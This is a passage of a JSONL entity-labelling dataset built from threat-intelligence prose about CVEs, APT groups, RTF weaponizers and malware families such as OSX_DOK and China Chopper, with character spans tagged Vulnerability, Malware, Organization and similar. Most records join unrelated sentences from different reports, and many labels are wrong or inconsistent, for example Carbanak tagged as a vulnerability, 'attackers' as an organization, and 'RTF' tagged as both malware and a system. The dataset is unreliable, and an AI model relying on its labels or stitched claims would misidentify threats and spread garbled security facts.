CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 49, "end": 69, "label": "Malware"}, {"start": 74, "end": 93, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 200, "end": 207, "label": "Vulnerability"}, {"start": 208, "end": 228, "label": "Indicator"}, {"start": 233, "end": 252, "label": "Indicator"}]} {"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 28, "end": 41, "label": "Vulnerability"}, {"start": 45, "end": 57, "label": "Malware"}, {"start": 65, "end": 68, "label": "System"}, {"start": 88, "end": 101, "label": "Vulnerability"}, {"start": 105, "end": 117, "label": "Indicator"}]} {"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . At this time , we do not believe that the attackers found a new ASA exploit .", "spans": [{"start": 146, "end": 152, "label": "Malware"}, {"start": 172, "end": 186, "label": "Vulnerability"}, {"start": 190, "end": 203, "label": "Vulnerability"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 270, "end": 273, "label": "System"}, {"start": 274, "end": 281, "label": "Vulnerability"}]} {"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . 
We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution ( RCE ) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor .", "spans": [{"start": 52, "end": 61, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 169, "end": 175, "label": "Organization"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 234, "end": 271, "label": "System"}, {"start": 274, "end": 277, "label": "System"}]} {"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 86, "end": 89, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 279, "end": 285, "label": "Indicator"}, {"start": 305, "end": 319, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}]} {"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . 
After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft \u2019s Equation Editor ( EQNEDT32 ) .", "spans": [{"start": 66, "end": 80, "label": "Vulnerability"}, {"start": 147, "end": 161, "label": "Malware"}, {"start": 192, "end": 204, "label": "Malware"}, {"start": 337, "end": 346, "label": "Indicator"}, {"start": 367, "end": 380, "label": "Vulnerability"}, {"start": 398, "end": 407, "label": "Organization"}, {"start": 411, "end": 426, "label": "System"}, {"start": 429, "end": 437, "label": "System"}]} {"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": [{"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 118, "end": 143, "label": "Malware"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 210, "end": 217, "label": "Organization"}, {"start": 296, "end": 299, "label": "Indicator"}, {"start": 315, "end": 322, "label": "Vulnerability"}, {"start": 327, "end": 340, "label": "Vulnerability"}]} {"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . 
CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 228, "end": 242, "label": "Vulnerability"}, {"start": 245, "end": 258, "label": "Vulnerability"}]} {"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 284, "end": 298, "label": "Vulnerability"}, {"start": 303, "end": 316, "label": "Vulnerability"}, {"start": 323, "end": 333, "label": "Malware"}, {"start": 382, "end": 388, "label": "Organization"}]} {"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 223, "end": 236, "label": "Organization"}, {"start": 255, "end": 268, "label": "Vulnerability"}, {"start": 278, "end": 292, "label": "Malware"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Organization"}, {"start": 264, "end": 271, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 205, "end": 209, "label": "System"}, {"start": 248, "end": 262, "label": "Vulnerability"}, {"start": 329, "end": 343, "label": "Indicator"}, {"start": 374, "end": 386, "label": "Indicator"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 281, "end": 288, "label": "Vulnerability"}, {"start": 289, "end": 302, "label": "Vulnerability"}, {"start": 320, "end": 345, "label": "Indicator"}, {"start": 348, "end": 362, "label": "Indicator"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. 
Maudi Surveillance Operation which was previously reported in 2013 .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 223, "end": 232, "label": "Organization"}, {"start": 249, "end": 256, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}, {"start": 349, "end": 354, "label": "Organization"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . specifically CVE-2018-0798 , before downloading subsequent payloads .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 212, "end": 225, "label": "Vulnerability"}]} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 193, "end": 210, "label": "Organization"}, {"start": 297, "end": 304, "label": "Vulnerability"}, {"start": 309, "end": 324, "label": "Vulnerability"}]} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . 
Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 190, "end": 197, "label": "Vulnerability"}, {"start": 207, "end": 220, "label": "Vulnerability"}]} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 315, "end": 325, "label": "Organization"}, {"start": 375, "end": 382, "label": "Vulnerability"}, {"start": 390, "end": 396, "label": "System"}, {"start": 415, "end": 429, "label": "Vulnerability"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. 
, not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 232, "end": 242, "label": "Indicator"}, {"start": 391, "end": 398, "label": "Vulnerability"}, {"start": 403, "end": 409, "label": "System"}, {"start": 428, "end": 442, "label": "Vulnerability"}]} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 208, "end": 215, "label": "Vulnerability"}, {"start": 216, "end": 229, "label": "Vulnerability"}, {"start": 258, "end": 271, "label": "Vulnerability"}, {"start": 275, "end": 282, "label": "System"}, {"start": 394, "end": 410, "label": "Vulnerability"}, {"start": 411, "end": 418, "label": "Vulnerability"}]} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . 
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 142, "end": 155, "label": "Indicator"}, {"start": 217, "end": 224, "label": "Vulnerability"}, {"start": 248, "end": 255, "label": "Vulnerability"}, {"start": 260, "end": 267, "label": "System"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 300, "end": 313, "label": "Vulnerability"}, {"start": 318, "end": 331, "label": "Vulnerability"}, {"start": 345, "end": 353, "label": "Organization"}]} {"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 39, "end": 49, "label": "Malware"}, {"start": 149, "end": 160, "label": "Organization"}, {"start": 243, "end": 252, "label": "Organization"}, {"start": 276, "end": 290, "label": "Vulnerability"}, {"start": 302, "end": 315, "label": "Vulnerability"}]} {"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . 
The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 19, "end": 45, "label": "Malware"}, {"start": 125, "end": 132, "label": "Indicator"}, {"start": 171, "end": 177, "label": "System"}, {"start": 193, "end": 206, "label": "Vulnerability"}]} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 170, "end": 178, "label": "Indicator"}]} {"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": [{"start": 34, "end": 45, "label": "Malware"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 241, "end": 247, "label": "System"}, {"start": 290, "end": 297, "label": "Vulnerability"}, {"start": 306, "end": 320, "label": "Vulnerability"}, {"start": 321, "end": 334, "label": "Vulnerability"}]} {"text": "This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . 
The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 65, "end": 89, "label": "Malware"}, {"start": 92, "end": 98, "label": "Malware"}, {"start": 101, "end": 107, "label": "Malware"}, {"start": 110, "end": 123, "label": "Malware"}, {"start": 128, "end": 142, "label": "Malware"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 166, "end": 175, "label": "Organization"}]} {"text": "It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell .", "spans": [{"start": 18, "end": 31, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 102, "end": 116, "label": "Organization"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 163, "end": 172, "label": "Organization"}, {"start": 195, "end": 208, "label": "Vulnerability"}]} {"text": "With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 .", "spans": [{"start": 24, "end": 35, "label": "Malware"}, {"start": 41, "end": 45, "label": "Malware"}, {"start": 223, "end": 236, "label": "Vulnerability"}]} {"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . 
In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks .", "spans": [{"start": 3, "end": 22, "label": "Malware"}, {"start": 25, "end": 36, "label": "Malware"}, {"start": 48, "end": 65, "label": "Malware"}, {"start": 191, "end": 200, "label": "System"}, {"start": 254, "end": 257, "label": "System"}, {"start": 327, "end": 341, "label": "Organization"}]} {"text": "To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . OSX Malware Linked to Operation Emmental Hijacks User Network Traffic .", "spans": [{"start": 50, "end": 61, "label": "Malware"}, {"start": 84, "end": 91, "label": "Malware"}, {"start": 96, "end": 123, "label": "Malware"}, {"start": 131, "end": 137, "label": "Malware"}, {"start": 160, "end": 163, "label": "System"}, {"start": 164, "end": 171, "label": "Malware"}]} {"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The OSX_DOK malware ( Detected by Trend Micro as OSX_DOK.C ) showcases sophisticated features such as certificate abuse and security software evasion that affects machines using Apple \u2019s OS X operating system .", "spans": [{"start": 37, "end": 45, "label": "Malware"}, {"start": 57, "end": 67, "label": "Malware"}, {"start": 136, "end": 143, "label": "Malware"}, {"start": 144, "end": 151, "label": "Malware"}, {"start": 166, "end": 177, "label": "Organization"}, {"start": 181, "end": 190, "label": "Malware"}, {"start": 310, "end": 323, "label": "System"}]} {"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . 
This malware , which specifically targets Swiss banking users , uses a phishing campaign to drop its payload , which eventually results in the hijacking of a user \u2019s network traffic using a Man-in-the-Middle ( MitM ) attack .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 49, "end": 67, "label": "Malware"}, {"start": 90, "end": 107, "label": "Malware"}, {"start": 155, "end": 162, "label": "Malware"}]} {"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . OSX_DOK.C seems to be another version of WERDLOD ( Detected by Trend Micro as TROJ_WERDLOD Family ) , which is a malware that was used during the Operation Emmental campaigns\u2014an interesting development that we will tackle further in this blog post .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 61, "end": 67, "label": "Malware"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 83, "end": 96, "label": "Malware"}, {"start": 99, "end": 125, "label": "Malware"}, {"start": 128, "end": 137, "label": "Malware"}, {"start": 169, "end": 176, "label": "Malware"}, {"start": 191, "end": 202, "label": "Organization"}, {"start": 206, "end": 225, "label": "Malware"}]} {"text": "The PowerShell version of the Trojan also has the ability to get screenshots . OSX_DOK.C first arrives via a phishing email that contains certain files labeled as either .zip or .docx files .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 61, "end": 64, "label": "Malware"}, {"start": 65, "end": 76, "label": "Malware"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 109, "end": 123, "label": "Indicator"}]} {"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . 
The sample we analyzed was a purported message from a police inspector in Zurich allegedly claiming to unsuccessfully contact the recipient .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 174, "end": 196, "label": "Malware"}]} {"text": "BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . The email also comes with two files attached claiming to contain questions for the user : one is a .zip file , which is a fake OS X app , while the other is a .docx file used to target Windows operating systems using WERDLOD .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 43, "end": 50, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 240, "end": 245, "label": "System"}, {"start": 363, "end": 371, "label": "System"}, {"start": 421, "end": 428, "label": "System"}, {"start": 453, "end": 460, "label": "Malware"}]} {"text": "The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . Both of these samples work as Banking Trojans and provide similar functionalities .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 17, "end": 24, "label": "Malware"}, {"start": 133, "end": 148, "label": "Malware"}]} {"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . 
Some examples of the files used in the email attachment include the following :", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 58, "end": 65, "label": "Malware"}, {"start": 213, "end": 218, "label": "System"}]} {"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . Zahlungsinformationen 01.06.2017.zip .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 93, "end": 100, "label": "Malware"}, {"start": 134, "end": 170, "label": "Indicator"}]} {"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . Zahlungsinformationen digitec.zip .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 9, "end": 21, "label": "Malware"}, {"start": 135, "end": 168, "label": "Indicator"}]} {"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Dokument 09.06.2017.zip .", "spans": [{"start": 31, "end": 48, "label": "Malware"}, {"start": 61, "end": 69, "label": "Malware"}, {"start": 74, "end": 92, "label": "Malware"}, {"start": 132, "end": 139, "label": "Malware"}, {"start": 142, "end": 165, "label": "Indicator"}]} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . 
Dokument 09.06.2017.docx .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 221, "end": 245, "label": "Indicator"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 06.2017.docx .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 159, "end": 171, "label": "Indicator"}]} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Once the docx file included in the phishing email is clicked , a warning window will pop up .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}]} {"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . After this , the App Store on the system will be removed , followed by a full screen fake OS X update screen .", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 119, "end": 128, "label": "System"}, {"start": 192, "end": 196, "label": "System"}]} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . 
It will ask for a password to run command as root .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}]} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . The malware will begin to download other utilities .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 240, "end": 249, "label": "System"}]} {"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . It relies on Homebrew , an open source software package manager to install Golang and Tor .", "spans": [{"start": 48, "end": 52, "label": "Malware"}, {"start": 57, "end": 64, "label": "Malware"}, {"start": 111, "end": 119, "label": "System"}, {"start": 137, "end": 145, "label": "System"}, {"start": 173, "end": 179, "label": "System"}, {"start": 184, "end": 187, "label": "System"}]} {"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . The malware will then install fake certificates in the system to perform a MitM attack without notifying the user .", "spans": [{"start": 58, "end": 64, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}]} {"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . 
The structure of the fake App Store matches the application bundle structure and provides both English and German interfaces .", "spans": [{"start": 44, "end": 76, "label": "Malware"}, {"start": 199, "end": 208, "label": "System"}]} {"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . The archive in Mac OS X looks like this :", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 110, "end": 124, "label": "Malware"}, {"start": 193, "end": 201, "label": "System"}]} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Mac OS X will run the application if it passes certificates .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 221, "end": 229, "label": "System"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . In this case , the malware is signed off by a \u201c developer \u201d , which may actually be a dummy account or that of a compromised user .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
In addition , the time stamp on the CA is new , which might mean that it was obtained specifically for this attack .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 195, "end": 197, "label": "Organization"}]} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . The fake certificate imitates the COMODO root certificate .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 139, "end": 145, "label": "Organization"}]} {"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Take note that the fake certificate does not contain a COMODO Certificate Authority seal that certifies its validity , as seen in the comparison below :", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 157, "end": 185, "label": "Organization"}]} {"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . 
We noticed that this malware will not work for Mozilla Firefox or Google Chrome since these two browsers have their own root certificates .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 184, "end": 202, "label": "Organization"}, {"start": 252, "end": 267, "label": "System"}, {"start": 271, "end": 284, "label": "System"}, {"start": 301, "end": 309, "label": "System"}]} {"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East . Of all the major browsers , only Safari uses the system \u2019s certificates .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 91, "end": 100, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 125, "end": 133, "label": "Organization"}, {"start": 140, "end": 158, "label": "Organization"}, {"start": 242, "end": 250, "label": "System"}, {"start": 258, "end": 264, "label": "System"}]} {"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . 
We observed the attacker targeting both Windows and Mac OS X in the same spam mail on June 9 , 2017 .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 91, "end": 100, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 125, "end": 133, "label": "Organization"}, {"start": 140, "end": 158, "label": "Organization"}, {"start": 201, "end": 208, "label": "System"}, {"start": 213, "end": 221, "label": "System"}]} {"text": "Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs . There is a file shortcut embedded in the malicious .docx file\u2014one that will download an executable file from Dropbox that executes once clicked by the user .", "spans": [{"start": 45, "end": 57, "label": "Organization"}, {"start": 104, "end": 122, "label": "Organization"}, {"start": 159, "end": 184, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 257, "end": 262, "label": "Indicator"}, {"start": 315, "end": 322, "label": "System"}]} {"text": "The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . 
The functionalities are similar to the malicious app provided , which includes installing tor and proxy .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 71, "end": 80, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 96, "end": 102, "label": "Organization"}, {"start": 105, "end": 113, "label": "Organization"}, {"start": 116, "end": 134, "label": "Organization"}, {"start": 197, "end": 210, "label": "Malware"}, {"start": 248, "end": 251, "label": "System"}, {"start": 256, "end": 261, "label": "System"}]} {"text": "HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . We have already notified Dropbox about the use of its service for this malware .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 50, "end": 55, "label": "Organization"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 135, "end": 141, "label": "Organization"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 156, "end": 166, "label": "Organization"}, {"start": 169, 